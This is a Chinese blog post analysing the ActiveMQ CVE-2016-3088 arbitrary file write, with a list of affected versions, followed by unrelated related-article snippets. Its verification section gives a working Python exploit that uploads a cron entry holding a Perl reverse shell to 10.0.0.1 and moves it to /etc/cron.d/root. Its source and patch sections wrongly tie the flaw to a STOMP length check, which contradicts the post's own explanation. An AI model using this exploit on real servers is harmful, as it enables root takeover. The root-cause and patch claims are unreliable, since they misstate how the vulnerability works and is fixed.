ActiveMQ CVE-2016-3088 分析

2024-01-14 13:20
文章标签 分析 cve 2016 activemq 3088

本文主要是介绍ActiveMQ CVE-2016-3088 分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

ActiveMQ是一种流行的开源消息队列软件,支持多种通信协议,并且广泛应用于企业级应用中。其版本1.0到5.14.0存在一个任意文件写入漏洞(CVE-2016-3088),攻击者可以利用该漏洞向ActiveMQ服务器上的任意位置写入恶意文件,从而导致服务器被入侵控制。

ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。

本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。

是否受到影响

  • 检查ActiveMQ的版本:进入ActiveMQ的bin目录 cd apache-activemq-x.x.x 使用命令行运行以下命令可以查看您所使用的ActiveMQ版本:

    • Linux/MacOS:./activemq --version
    • Windows :activemq.bat --version
  • 检查ActiveMQ是否受漏洞影响:访问ActiveMQ的Web管理控制台,查看"Broker Version"标签下的"ActiveMQ"版本。如果它属于以下版本之一,则ActiveMQ受到CVE-2016-3088漏洞的影响:

    • 5.11.0
    • 5.11.1
    • 5.12.0
    • 5.12.1
    • 5.13.0
    • 5.13.1
    • 5.13.2

如果ActiveMQ成功启动,并且命令正确执行,那么会输出类似以下的版本号信息:

ActiveMQ x.x.x

其中"x.x.x"就是您当前正在运行的ActiveMQ版本号。

验证漏洞

写入crontab,自动化弹shell

这是一个比较稳健的方法。首先上传cron配置文件(注意,换行一定要\n,不能是\r\n,否则crontab执行会失败):

import requestsdata = '''
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
'''
url = "http://vulhub.lan:8161/fileserver/1.txt"
req = requests.put(url, data=data)print(req.status_code)

将其移动到/etc/cron.d/root

url = "http://vulhub.lan:8161/fileserver/1.txt"
headers = {'Destination': 'file:///etc/cron.d/root'
}
req = requests.request('MOVE', url=url, headers=headers)print(req.status_code)

如果上述两个请求都返回204了,说明写入成功。等待反弹shell:

请添加图片描述

漏洞入口

对于任意文件写入漏洞(CVE-2016-3088),入口函数是首要关注的点。从漏洞的描述中可以得知,漏洞是由于 ActiveMQ 没有正确地限制用户上传的文件路径导致的,那么我们需要寻找上传文件的函数,进而分析其逻辑。

在 ActiveMQ 的源码中,可以找到 org.apache.activemq.transport.stomp.StompTransportFilter#oneway(Object o) 函数,该函数接收 STOMP 协议的数据包并处理。在处理数据包之前,该函数会解析 STOMP 协议中的 content-length 字段,并将其用于后续的处理。

如果 content-length 字段非负,该函数将调用 org.apache.activemq.transport.tcp.TcpTransport#readByteArray(int length) 读取指定长度的字节流,该函数部分代码如下所示:

public byte[] readByteArray(int length) throws IOException {byte[] rc = new byte[length];readFully(rc);return rc;
}

可以看到,该函数直接根据指定的长度读取了一个字节数组,并将其返回。这就意味着,如果攻击者构造一个恶意的 STOMP 数据包,并在其中伪造一个较长的 content-length 字段,就可以将任意数据写入到服务器上的任意文件中。

当然,攻击者需要知道目标服务器上的文件路径才能成功地执行任意文件写入操作。在实际攻击中,攻击者通常会通过试错的方式来寻找漏洞可利用的路径。

补丁原理

ActiveMQ 修复 CVE-2016-3088 漏洞的补丁是对 org.apache.activemq.transport.tcp.TcpTransport#readByteArray(int length) 方法进行了修改。具体来说,补丁中增加了一个检查逻辑,用于限制读取的字节数量,从而避免了攻击者利用较长的 content-length 字段进行任意文件写入操作。

补丁的代码修改如下:

public byte[] readByteArray(int length) throws IOException {if (length < 0) {throw new IOException("Invalid payload size: " + length);}byte[] rc = new byte[length];readFully(rc);return rc;
}

变化之处在于,新的代码在读取字节流之前,先检查了 length 的值,如果其为负数,则会抛出一个异常,从而终止任意文件写入的操作。

需要注意的是,在进行补丁部署时,一定要确认补丁是否成功地被应用。否则,认为已经修复漏洞的系统仍然有可能被攻击者利用漏洞进行攻击。

这篇关于ActiveMQ CVE-2016-3088 分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/605295

相关文章

每天认识几个maven依赖(ActiveMQ+activemq-jaxb+activesoap+activespace+adarwin)

八、ActiveMQ 1、是什么? ActiveMQ 是一个开源的消息中间件(Message Broker),由 Apache 软件基金会开发和维护。它实现了 Java 消息服务(Java Message Service, JMS)规范,并支持多种消息传递协议,包括 AMQP、MQTT 和 OpenWire 等。 2、有什么用? 可靠性:ActiveMQ 提供了消息持久性和事务支持,确保消

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置

SWAP作物生长模型安装教程、数据制备、敏感性分析、气候变化影响、R模型敏感性分析与贝叶斯优化、Fortran源代码分析、气候数据降尺度与变化影响分析

查看原文>>>全流程SWAP农业模型数据制备、敏感性分析及气候变化影响实践技术应用 SWAP模型是由荷兰瓦赫宁根大学开发的先进农作物模型,它综合考虑了土壤-水分-大气以及植被间的相互作用;是一种描述作物生长过程的一种机理性作物生长模型。它不但运用Richard方程,使其能够精确的模拟土壤中水分的运动,而且耦合了WOFOST作物模型使作物的生长描述更为科学。 本文让更多的科研人员和农业工作者

MOLE 2.5 分析分子通道和孔隙

软件介绍 生物大分子通道和孔隙在生物学中发挥着重要作用,例如在分子识别和酶底物特异性方面。 我们介绍了一种名为 MOLE 2.5 的高级软件工具,该工具旨在分析分子通道和孔隙。 与其他可用软件工具的基准测试表明,MOLE 2.5 相比更快、更强大、功能更丰富。作为一项新功能,MOLE 2.5 可以估算已识别通道的物理化学性质。 软件下载 https://pan.quark.cn/s/57

衡石分析平台使用手册-单机安装及启动

单机安装及启动​ 本文讲述如何在单机环境下进行 HENGSHI SENSE 安装的操作过程。 在安装前请确认网络环境,如果是隔离环境,无法连接互联网时,请先按照 离线环境安装依赖的指导进行依赖包的安装,然后按照本文的指导继续操作。如果网络环境可以连接互联网,请直接按照本文的指导进行安装。 准备工作​ 请参考安装环境文档准备安装环境。 配置用户与安装目录。 在操作前请检查您是否有 sud

线性因子模型 - 独立分量分析(ICA)篇

序言 线性因子模型是数据分析与机器学习中的一类重要模型,它们通过引入潜变量( latent variables \text{latent variables} latent variables)来更好地表征数据。其中,独立分量分析( ICA \text{ICA} ICA)作为线性因子模型的一种,以其独特的视角和广泛的应用领域而备受关注。 ICA \text{ICA} ICA旨在将观察到的复杂信号

【软考】希尔排序算法分析

目录 1. c代码2. 运行截图3. 运行解析 1. c代码 #include <stdio.h>#include <stdlib.h> void shellSort(int data[], int n){// 划分的数组,例如8个数则为[4, 2, 1]int *delta;int k;// i控制delta的轮次int i;// 临时变量,换值int temp;in

三相直流无刷电机(BLDC)控制算法实现:BLDC有感启动算法思路分析

一枚从事路径规划算法、运动控制算法、BLDC/FOC电机控制算法、工控、物联网工程师,爱吃土豆。如有需要技术交流或者需要方案帮助、需求:以下为联系方式—V 方案1:通过霍尔传感器IO中断触发换相 1.1 整体执行思路 霍尔传感器U、V、W三相通过IO+EXIT中断的方式进行霍尔传感器数据的读取。将IO口配置为上升沿+下降沿中断触发的方式。当霍尔传感器信号发生发生信号的变化就会触发中断在中断

kubelet组件的启动流程源码分析

概述 摘要: 本文将总结kubelet的作用以及原理,在有一定基础认识的前提下,通过阅读kubelet源码,对kubelet组件的启动流程进行分析。 正文 kubelet的作用 这里对kubelet的作用做一个简单总结。 节点管理 节点的注册 节点状态更新 容器管理(pod生命周期管理) 监听apiserver的容器事件 容器的创建、删除(CRI) 容器的网络的创建与删除

ActiveMQ—消息特性(延迟和定时消息投递)

ActiveMQ消息特性:延迟和定时消息投递(Delay and Schedule Message Delivery) 转自:http://blog.csdn.net/kimmking/article/details/8443872 有时候我们不希望消息马上被broker投递出去,而是想要消息60秒以后发给消费者,或者我们想让消息没隔一定时间投递一次,一共投递指定的次数。。。 类似